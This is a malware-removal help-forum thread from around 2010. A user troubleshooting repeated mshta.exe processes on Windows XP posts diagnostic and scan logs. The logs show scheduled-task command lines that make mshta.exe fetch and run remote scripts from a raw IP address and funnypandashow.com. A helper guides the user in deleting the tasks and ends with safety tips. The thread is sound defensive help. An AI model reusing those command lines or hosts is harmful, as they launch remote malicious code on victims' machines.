PDA

View Full Version : mshta.exe repeatedly appearing in Task Manager



TheDeepBlue
2010-12-27, 00:56
For a few days now, the program mshta.exe has been appearing multiple times in my Task Manager, even if I end them all at any given time. I've seen as many as a couple dozen instances of the program. While it hasn't caused too many major problems yet, at least that I can tell, the file size seems to be getting larger. The smallest I've seen it is around 8 K. A few minutes ago, each instance was at 13 K. I don't like this trend.

I've tried looking up a solution on the interwebs myself, and deleted over a thousand tracking cookies and at least one legit piece of malware in the process, but to no avail. From what I've read so far, the two things that leaped out at me the most are:
1) mshta.exe is a legit system32 file, and its repeated appearance may be a bug with my operating system in conjuction with the Add or Remove Programs tool, and
2) mshta.exe 's repeated appearance may be a symptom of something that doesn't belong; if not 1), then something worse.

I think that the most significant thing I (intentionally) did before this started happening was that I installed a new version of AIM without uninstalling the old version first; I didn't like the new version, so I uninstalled it using the uninstaller that came with it.

Anyway, a friend vouched for this board and I'm giving it a shot. Halp.



DDS (Ver_10-12-12.02) - NTFSx86
Run by Erick at 16:23:04.03 on Sun 12/26/2010
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.3583.2650 [GMT -6:00]

AV: AVG Anti-Virus *Enabled/Updated* {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINNT\system32\svchost -k DcomLaunch
svchost.exe
C:\WINNT\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgchsvx.exe
C:\Program Files\AVG\AVG9\avgrsx.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgwdsvc.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINNT\system32\LxrJD31s.exe
C:\WINNT\system32\nvsvc32.exe
C:\Program Files\AVG\AVG9\avgam.exe
C:\Program Files\AVG\AVG9\avgnsx.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINNT\system32\svchost.exe -k imgsvc
C:\WINNT\Explorer.EXE
C:\Program Files\SmartDisk\Flash Media Reader\shwicon.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Nero\Nero 7\InCD\NBHGui.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\WINNT\system32\RUNDLL32.EXE
C:\PROGRA~1\AVG\AVG9\avgtray.exe
C:\WINNT\system32\devldr32.exe
C:\WINNT\system32\ctfmon.exe
C:\program files\steam\steam.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
C:\Program Files\AIM\aim.exe
C:\WINNT\System32\mshta.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINNT\System32\mshta.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINNT\System32\mshta.exe
C:\Documents and Settings\Erick\Local Settings\Temporary Internet

Files\Content.IE5\JRV62GV1\dds[1].scr

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.hotmail.com/
uSearch Page = hxxp://www.google.com
uSearch Bar = hxxp://www.google.com/ie
uURLSearchHooks: AVG Security Toolbar BHO: {a3bc75a2-1f87-4686-aa43-5347d756017c} -

c:\program files\avg\avg9\toolbar\IEToolbar.dll
mURLSearchHooks: AVG Security Toolbar BHO: {a3bc75a2-1f87-4686-aa43-5347d756017c} -

c:\program files\avg\avg9\toolbar\IEToolbar.dll
BHO: AcroIEHlprObj Class: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program

files\adobe\acrobat 7.0\activex\AcroIEHelper.dll
BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program

files\avg\avg9\avgssie.dll
BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\program

files\spybot - search & destroy\SDHelper.dll
BHO: AVG Security Toolbar BHO: {a3bc75a2-1f87-4686-aa43-5347d756017c} - c:\program

files\avg\avg9\toolbar\IEToolbar.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program

files\java\jre6\bin\jp2ssv.dll
TB: AVG Security Toolbar: {ccc7a320-b3ca-4199-b1a6-9f516dd69829} - c:\program

files\avg\avg9\toolbar\IEToolbar.dll
TB: {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No File
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
uRun: [MSMSGS] "c:\program files\messenger\msmsgs.exe" /background
uRun: [ctfmon.exe] c:\winnt\system32\ctfmon.exe
uRun: [Steam] "c:\program files\steam\steam.exe" -silent
uRun: [LightScribe Control Panel] "c:\program files\common

files\lightscribe\LightScribeControlPanel.exe" -hidden
uRun: [SUPERAntiSpyware] c:\program files\superantispyware\SUPERAntiSpyware.exe
mRun: [ShowIcon_SmartDisk Corporation_SmartDisk Flash Media Reader Support 2.1]

"c:\program files\smartdisk\flash media reader\shwicon.exe" -t"smartdisk

corporation\SmartDisk Flash Media Reader Support 2.1"
mRun: [SW20] "c:\winnt\system32\sw20.exe"
mRun: [RemoteControl] "c:\program files\cyberlink\powerdvd\PDVDServ.exe"
mRun: [LanguageShortcut] "c:\program files\cyberlink\powerdvd\language\Language.exe"
mRun: [LGODDFU] "c:\program files\lg_fwupdate\fwupdate.exe" blrun
mRun: [SecurDisc] "c:\program files\nero\nero 7\incd\NBHGui.exe"
mRun: [InCD] "c:\program files\nero\nero 7\incd\InCD.exe"
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
mRun: [NvCplDaemon] RUNDLL32.EXE c:\winnt\system32\NvCpl.dll,NvStartup
mRun: [nwiz] nwiz.exe /install
mRun: [NvMediaCenter] RUNDLL32.EXE c:\winnt\system32\NvMcTray.dll,NvTaskbarInit
mRun: [GEST] ]
mRun: [QuickTime Task] "c:\program files\quicktime\qttask.exe" -atboottime
mRun: [<NO NAME>]
mRun: [AVG9_TRAY] c:\progra~1\avg\avg9\avgtray.exe
mRun: [EvtMgr6] c:\program files\logitech\setpointp\SetPoint.exe /launchGaming
dRunOnce: [^SetupICWDesktop] c:\program files\internet explorer\connection

wizard\icwconn1.exe /desktop
dRunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe
StartupFolder: c:\docume~1\erick\startm~1\programs\startup\adobeg~1.lnk - c:\program

files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\erick\startm~1\programs\startup\erunta~1.lnk - c:\program

files\erunt\AUTOBACK.EXE
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobeg~1.lnk - c:\program

files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program

files\adobe\acrobat 7.0\reader\reader_sl.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\hpdigi~1.lnk - c:\program

files\hp\digital imaging\bin\hpqtra08.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~1.lnk - c:\program

files\microsoft office\office\OSA9.EXE
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office12\EXCEL.EXE/3000
IE: {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - c:\program files\aim\aim.exe
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} -

c:\program files\spybot - search & destroy\SDHelper.dll
Trusted Zone: cityofheroes.com\boards
Trusted Zone: sun.com\java
DPF: DirectAnimation Java Classes - file://c:\winnt\java\classes\dajava.cab
DPF: Microsoft XML Parser for Java - file://c:\winnt\java\classes\xmldso.cab
DPF: RaptisoftGameLoader - hxxp://www.miniclip.com/haphazard/raptisoftgameloader.cab
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} -

hxxp://www.apple.com/qtactivex/qtplugin.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} -

hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} -

hxxp://download.microsoft.com/download/5/b/0/5b0d4654-aa20-495c-b89f-c1c34c691085/Legit

CheckControl.cab
DPF: {233C1507-6A77-46A4-9443-F871F945D258} -

hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: {41F17733-B041-4099-A042-B518BB6A408C} -

hxxp://a1540.g.akamai.net/7/1540/52/20031216/qtinstall.info.apple.com/mickey/us/win/Qui

ckTimeInstaller.exe
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} -

hxxp://gfx1.hotmail.com/mail/w2/resources/MSNPUpld.cab
DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} -

hxxp://cdn.scan.onecare.live.com/resource/download/scanner/wlscbase5483.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} -

hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?11

47640637654
DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} -

hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} -

hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?

1148195024359
DPF: {77E32299-629F-43C6-AB77-6A1E6D7663F6} -

hxxp://download.shockwave.com/pub/otoy/OTOYAX.cab
DPF: {7C6E92FA-4429-4FB6-909B-798E2EFFAEF0} - hxxp://www.coh.co.kr/common/ocx/ncweb.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} -

hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} -

hxxp://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38094.4437847222
DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} -

hxxp://cdn2.zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
DPF: {C49134CC-B5EF-458C-A442-E8DFE7B4645F} -

hxxp://www.yoyogames.com/downloads/activex/YoYo.cab
DPF: {CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA} -

hxxp://java.sun.com/products/plugin/autodl/jinstall-142-windows-i586.cab
DPF: {CAFEEFAC-0015-0000-0011-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.5.0/jinstall-1_5_0_11-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_05-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} -

hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} -

hxxp://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} -

hxxp://www.popcap.com/games/popcaploader_v6.cab
DPF: {E5D419D6-A846-4514-9FAD-97E826C84822} -

hxxp://fdl.msn.com/zone/datafiles/heartbeat.cab
DPF: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6} -

hxxp://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab
Handler: avgsecuritytoolbar - {F2DDE6B2-9684-4A55-86D4-E255E237B77C} - c:\program

files\avg\avg9\toolbar\IEToolbar.dll
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program

files\avg\avg9\avgpp.dll
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
Notify: avgrsstarter - avgrsstx.dll
Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program

files\superantispyware\SASSEH.DLL
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "c:\program files\common

files\lightscribe\LSRunOnce.exe"
Hosts: 127.0.0.1 www.spywareinfo.com

================= FIREFOX ===================

FF - ProfilePath -

c:\docume~1\erick\applic~1\mozilla\firefox\profiles\neepi7vu.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage -

hxxp://en-us.start.mozilla.com/firefox?client=firefox-a&rls=org.mozilla:en-US:official
FF - component: c:\program files\avg\avg9\firefox\components\avgssff.dll

---- FIREFOX POLICIES ----
FF - user.js: network.protocol-handler.warn-external.dnupdate - false
============= SERVICES / DRIVERS ===============

R0 AvgRkx86;avgrkx86.sys;c:\winnt\system32\drivers\avgrkx86.sys [2009-5-28 52872]
R0 JAHCI;JAHCI;c:\winnt\system32\drivers\JAHCI.sys [2006-5-15 33280]
R0 uliagpkx;ULi AGP Bus Filter Driver;c:\winnt\system32\drivers\AGPKX.SYS [2006-5-14

45056]
R1 AvgLdx86;AVG AVI Loader Driver x86;c:\winnt\system32\drivers\avgldx86.sys [2009-5-28

216400]
R1 AvgMfx86;AVG On-access Scanner Minifilter Driver

x86;c:\winnt\system32\drivers\avgmfx86.sys [2009-5-28 29584]
R1 AvgTdiX;AVG8 Network Redirector;c:\winnt\system32\drivers\avgtdix.sys [2009-5-28

243024]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2010-2-17 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2010-5-10 67656]
R2 avg9wd;AVG WatchDog;c:\program files\avg\avg9\avgwdsvc.exe [2010-6-22 308136]
R2 LBeepKE;Logitech Beep Suppression Driver;c:\winnt\system32\drivers\LBeepKE.sys

[2010-6-19 10448]
S3 Afdfprmnnp;Afdfprmnnp; [x]
S3 AvFlt;Antivirus Filter Driver;c:\winnt\system32\drivers\av5flt.sys -->

c:\winnt\system32\drivers\av5flt.sys [?]
S3 AVG Security Toolbar Service;AVG Security Toolbar Service;c:\program

files\avg\avg9\toolbar\ToolbarBroker.exe [2010-10-26 517448]
S3 Ms_mdsvr;Ms_mdsvr; [x]
S3 SetupNTGLM7X;SetupNTGLM7X;\??\d:\ntglm7x.sys --> d:\NTGLM7X.sys [?]
S3 SiS7012;Service for AC'97 Sample Driver (WDM);c:\winnt\system32\drivers\sis7012.sys

[2003-10-28 820858]
S3 Sybsaccegw;Sybsaccegw; [x]
S3 ULI5261XP;ULi M526X Ethernet NT Driver;c:\winnt\system32\drivers\ULILAN51.SYS

[2006-5-14 28672]
S3 usbhub20;USB 2.0 Root Hub Support;c:\winnt\system32\drivers\usbhub20.sys [2003-7-14

49776]

=============== Created Last 30 ================

2010-12-26 15:36:14 -------- d-----w-

c:\docume~1\erick\applic~1\SUPERAntiSpyware.com
2010-12-26 15:36:14 -------- d-----w-

c:\docume~1\alluse~1\applic~1\SUPERAntiSpyware.com
2010-12-26 15:36:09 -------- d-----w- c:\program

files\SUPERAntiSpyware
2010-12-24 16:49:33 388096 ----a-r-

c:\docume~1\erick\applic~1\microsoft\installer\{45a66726-69bc-466b-a7a4-12fcba4883d7}\H

iJackThis.exe
2010-12-24 16:49:33 -------- d-----w- c:\program files\Trend Micro
2010-12-24 16:45:20 -------- d-----w-

c:\docume~1\erick\locals~1\applic~1\CoHelper
2010-12-23 16:49:43 -------- d-----w-

c:\docume~1\erick\locals~1\applic~1\AOL
2010-12-23 16:48:34 -------- d-----w-

c:\docume~1\erick\locals~1\applic~1\AIM
2010-12-23 16:48:34 -------- d-----w-

c:\docume~1\alluse~1\applic~1\AIM
2010-12-23 16:48:18 -------- d-----w- c:\program files\common

files\Software Update Utility
2010-12-23 16:48:15 -------- d-----w- c:\program files\common

files\AOL
2010-12-15 18:36:05 40960 -c----w- c:\winnt\system32\dllcache\ndproxy.sys
2010-12-15 18:35:32 45568 -c----w- c:\winnt\system32\dllcache\wab.exe
2010-12-03 16:25:54 -------- d-----w- c:\program files\Titan Network

==================== Find3M ====================

2010-11-18 18:12:44 81920 ----a-w- c:\winnt\system32\isign32.dll
2010-11-07 16:30:10 221 ----a-w- c:\docume~1\erick\applic~1\sdrfzfgd.bat
2010-11-06 00:26:58 916480 ----a-w- c:\winnt\system32\wininet.dll
2010-11-06 00:26:58 43520 ----a-w- c:\winnt\system32\licmgr10.dll
2010-11-06 00:26:58 1469440 ----a-w- c:\winnt\system32\inetcpl.cpl
2010-11-03 12:25:54 385024 ----a-w- c:\winnt\system32\html.iec
2010-10-28 13:13:22 290048 ----a-w- c:\winnt\system32\atmfd.dll
2010-10-26 13:25:00 1853312 ----a-w- c:\winnt\system32\win32k.sys

============= FINISH: 16:23:41.31 ===============

shelf life
2010-12-30, 17:27
hi TheDeepBlue,

Your log is a few days old. If you still need help reply back.

TheDeepBlue
2010-12-30, 19:52
hi TheDeepBlue,

Your log is a few days old. If you still need help reply back.
Yup, it's still goin' on. I was just being attentive to the part where I was supposed to wait four full days.

If it's worth mentioning, I've seen the mshta.exe file sizes go a bit above 14 K since my first post. Also, I've noticed that I have multiple copies of svchost.exe running, with a couple running under NETWORK SERVICE and three under SYSTEM, as viewed from the Task Manager. The size of the largest svchost.exe file running under SYSTEM is 34.7 K and change.

shelf life
2010-12-30, 22:23
ok. For now you can get another download as a check for malware. We can also upload the .exe to a web site to get it checked out.

Please download the free version of Malwarebytes (http://www.malwarebytes.org/mbam.php) to your desktop.
Double-click mbam-setup.exe and follow the prompts to install the program.
Be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest version.
Once the program has loaded, select Perform FULL SCAN, then click Scan.
When the scan is complete, click OK, then Show Results to view the results.
Be sure that everything is checked, and click *Remove Selected.*

*A restart of your computer may be required to remove some items. If prompted please restart your computer to complete the fix.*

When completed, a log will open in Notepad. Please save it to a convenient location. The log can also be opened by going to Start > All Programs > Malwarebytes' Anti-Malware > Logs > log-date.txt
Post the log in your reply.

go to this web site (http://www.virustotal.com/) browse for the file in the system32 directory then upload it to the website using the send file button. the site can be busy at times. You should see nothing listed under the result column.

TheDeepBlue
2010-12-31, 10:43
Updated MWB and ran Full Scan. Log follows:


Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4052

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

12/30/2010 9:49:36 PM
mbam-log-2010-12-30 (21-49-36).txt

Scan type: Full scan (C:\|)
Objects scanned: 289794
Time elapsed: 1 hour(s), 7 minute(s), 9 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\System Volume Information\_restore{5E13212F-CDA6-4B95-8318-ABB4B45FA9B3}\RP143\A0007225.sys (Rootkit.Agent) -> No action taken.


I'm didn't understand clearly whether or not you wanted me to upload the mshta.exe file to VirusTotal or not, but I did go ahead and upload the file from the log above. This is what VirusTotal says initially:

MD5: 589312a3b46721c5a751e4d5222a89be
Date first seen: 2008-09-13 14:30:26 (UTC)
Date last seen: 2010-12-28 22:43:40 (UTC)
Detection ratio: 8/43

SHA1 : 3a497d3968a4f6e3c648d196da38e5f98e75ec30
SHA256: 03cbe6df7f5605a3659ffe27a1184a8d9066436a17d7bac9cceb122de74f69ae

There aren't very many comments on the site in reference to the file, but someone is saying that it's a 'part of malware' and others are saying that it's part of an antirootkit program called 'Avenger' or something, which I don't recall ever downloading.

TheDeepBlue
2010-12-31, 11:15
Would have edited my last post, but I can't on this forum. I did remove the anomalous files detected by MWB with the program; I wasn't aware it would generate another log, so here's that one:


Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4052

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

12/31/2010 2:48:13 AM
mbam-log-2010-12-31 (02-48-13).txt

Scan type: Quick scan
Objects scanned: 1
Time elapsed: 1 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

shelf life
2010-12-31, 17:42
Its a legit MS file that could be used by malware. I have seen it as a scheduled job for launching malware. Legit software can use it also.
Lets see if we can find out what is using it. I would download either one of these two utilities: Process (http://processhacker.sourceforge.net/) Hacker or Process (http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx) Explorer, both are similar. both downloads are zip files. Extract to your desktop.
In process hacker you want to use the .exe thats in the X86 folder.
For either one once you start the .exe find the mshta.exe process, right click on it and select properties and see what is listed in the command line. May provide some clues.

TheDeepBlue
2010-12-31, 21:20
The command line for each individual mshta.exe I've got running right now gives:

mshta.exe http://85.234.191.60/88.php?olala=327228975368992
mshta.exe http://funnypandashow.com/sdfg.php?d0tg=725519501766446
mshta.exe http://85.234.191.60/88.php?olala=47637796927128
mshta.exe http://85.234.191.60/88.php?olala=327228975368992
mshta.exe http://funnypandashow.com/sdfg.php?d0tg=725519501766446
mshta.exe http://85.234.191.60/88.php?olala=47637796927128
mshta.exe http://85.234.191.60/88.php?olala=327228975368992

shelf life
2010-12-31, 23:15
Take a look in task scheduler for any tasks.
start>programs>accessories>system tools>scheduled tasks
You can right click on each task and select delete if it something you dont recognise.

TheDeepBlue
2011-01-01, 00:10
Found over seventy tasks that I'm pretty sure I didn't set that came from one or the other of the two things in my previous post. Deleted them all.

I googled the 'funnypandashow.com' thing and it seems to be related to that Thinkpoint thing that's going around. I've dealt with it at least three times in the past and for some reason it seemed to always load Adobe Reader at the same time it hit my system. Ever since I patched Adobe Reader, I haven't seen it again, but apparently something might still be on my machine...?

shelf life
2011-01-01, 03:47
Pretty sure this is just a harmless left over from previous malware that didnt get cleaned up. The task was to run mshta.exe at certain times but was missing another critical component for it to be successful, it was probably removed by a scan, leaving only the scheduled task to run but unable to complete with a component missing. Thats my take on it anyway.

Now that you have deleted the tasks the mshta.exe process shouldn't be running in task manager anymore. The malwarebytes scan looks good. Why dont you give it a day or two, cruise around and make sure you dont have any other signs of malware on your machine. Link to some signs below.

shelf life
2011-01-02, 23:19
Hows it looking on your end now?

TheDeepBlue
2011-01-03, 08:37
Everything's still looking good. Thank you very much for the help!

shelf life
2011-01-03, 13:14
ok good. Your welcome. You can remove process explorer/hacker if you want to. Just delete the folder/icons from your desktop.
A few tips to help you remain malware free:

10 Tips for Prevention and Avoidance of Malware:
There is no reason why your computer can not stay malware free.

No software can think for you. Help yourself. In no special order:

1) It is essential to keep your operating system (Windows) browser (IE, FireFox, Chrome, Opera) and other software up to date to "patch" vulnerabilities that could be exploited. Visit Windows Update (http://www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en-us) frequently or use the Windows auto-update feature. (http://www.microsoft.com/windows/downloads/windowsupdate/automaticupdate.mspx) Staying updated is also essential for other web based applications like Java, Adobe Flash/Reader, iTunes etc. More and more third party applications are being targeted. Not sure if you are using the latest version of software? Check their version status and get the updates here. (http://secunia.com/vulnerability_scanning/online/)

2) Know what you are installing to your computer. Alot of software can come bundled with unwanted add-ons, like adware, toolbars and malware. More and more legitimate software is installing useless toolbars if not unchecked first. Do not install any files from ads, popups or random links. Do not fall for fake warnings about virus and trojans being found on your computer and you are then prompted to install software to remedy this. See also the signs (http://www.malwarevault.com/signs.html)that you may have malware on your computer.

3) Install and keep updated: one antivirus and two or three anti-malware applications. If not updated they will soon be worthless. If either of these frequently find malware then its time to *review your computer habits*.

4) Refrain from clicking on links or attachments via E-Mail, IM, IRC, Chat Rooms, Blogs or Social Networking Sites, no matter how tempting or legitimate the message may seem. See also E-mail phishing Tricks (http://www.fraud.org/tips/internet/phishing.htm).

5) Do not click on ads/pop ups or offers from websites requesting that you need to install software to your computer--*for any reason*. Use the Alt+F4 keys to close the window.

6) Don't click on offers to "scan" your computer. Install ActiveX Objects with care. Do you trust the website to install components?

7) Consider the use of limited (non-privileged) accounts for everyday use, rather than administrator accounts. Limited accounts (http://www.microsoft.com/protect/computer/advanced/useraccount.mspx) can help prevent *malware from installing and lessen its potential impact.* This is exactly what user account control (UAC) in Windows Vista and Windows 7 attempts to address.

8) Install and understand the *limitations* of a software firewall.

9) A tool (http://nsslabs.com/general/ie8-hardening-tool.html)for automatically hardening and securing Internet Explorer 8.0. Requires site registration for downloading. Changes some of the default settings of IE 8.0, Read the FAQ's. Or see a slide show Here (http://threatpost.com/en_us/slideshow/How%20to%20configure%20Internet%20Explorer%20for%20secure%20surfing) and do it yourself. How to harden FireFox. (http://threatpost.com/en_us/slideshow/How-to-configure-Mozilla-Firefox-for-secure-surfing?utm_source=Second+Sidebar&utm_medium=Featured+Slideshows&utm_campaign=Configure+Mozilla+Firefox) for safer surfing.

10) Warez, cracks etc are very popular for carrying malware payloads. If you look for these you will encounter malware. If you download/install files via p2p networks you will encounter malware. Can you really trust the source of the file?


More info/tips with pictures in links below.

Happy Safe Surfing.